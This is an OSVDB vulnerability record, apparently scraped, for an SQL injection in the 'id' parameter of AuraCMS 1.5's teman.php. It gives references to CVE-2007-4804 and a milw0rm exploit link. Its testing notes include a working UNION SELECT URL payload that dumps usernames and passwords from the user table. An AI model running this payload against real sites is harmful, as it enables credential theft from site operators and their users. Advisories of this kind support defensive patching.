AuraCMS teman.php id Variable SQL Injection

2007-09-09T00:00:00
ID OSVDB:38413
Type osvdb
Reporter OSVDB
Modified 2007-09-09T00:00:00

Description

Manual Testing Notes

http://[target]/AuraCMS1.5/?pilih=teman&id=-9%20UNION%20SELECT%20null,concat(user,0x3a,password),null,null,null,null,null,null%20from%20user/*

References:

Related OSVDB ID: 38411 Related OSVDB ID: 38409 Related OSVDB ID: 38410 Related OSVDB ID: 38412 ISS X-Force ID: 36519 Generic Exploit URL: http://www.milw0rm.com/exploits/4385 CVE-2007-4804 Bugtraq ID: 25614